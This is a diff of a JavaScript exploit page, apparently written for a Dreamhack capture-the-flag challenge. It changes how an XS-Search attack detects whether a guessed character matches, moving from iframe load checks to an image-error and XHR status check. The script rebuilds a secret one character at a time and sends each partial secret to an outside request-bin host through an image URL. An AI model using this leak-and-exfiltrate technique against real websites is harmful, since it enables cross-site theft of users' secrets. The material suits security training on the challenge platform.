--- a/exserver.html
+++ b/exserver.html
@@ -3,14 +3,29 @@
 <script>
     async function req(url) {
         return await new Promise((resolve, reject) => {
-            const iframe = document.getElementById("iframe");
-            iframe.src = url;
-            iframe.onload = () => { 
-                if (iframeDocument && iframeDocument.body.innerHTML.indexOf("404 Not Found") === -1)
-                    return resolve();
-                else
-                    return reject();
-            };
+            var img = document.createElement("img");
+            img.src = url;
+            document.body.appendChild(img);
+
+            img.addEventListener('error', function() {
+                var xhr = new XMLHttpRequest();
+                xhr.onreadystatechange = function() {
+                    if (xhr.readyState === 4) {
+                        if (xhr.status === 404) {
+                            console.log('Image not found (404 Not Found)');
+                            // 여기에서 404 오류를 처리하거나 필요한 작업을 수행할 수 있습니다.
+                            return reject();
+                        } else {
+                            console.log('Other error:', xhr.status);
+                            // 다른 종류의 오류를 처리할 수도 있습니다.
+                            return resolve();
+                        }
+                    }
+                };
+
+                xhr.open('GET', img.src, true);
+                xhr.send();
+            }); 
         });
     }
     async function search(query) {
@@ -30,7 +45,7 @@
             for (let c of chars) {
                 if (await search(secret + c)) {
                     secret += c;
-                    img.src = `https://xshiofr.request.dreamhack.games/${secret}`;
+                    img.src = `https://smmsjxk.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
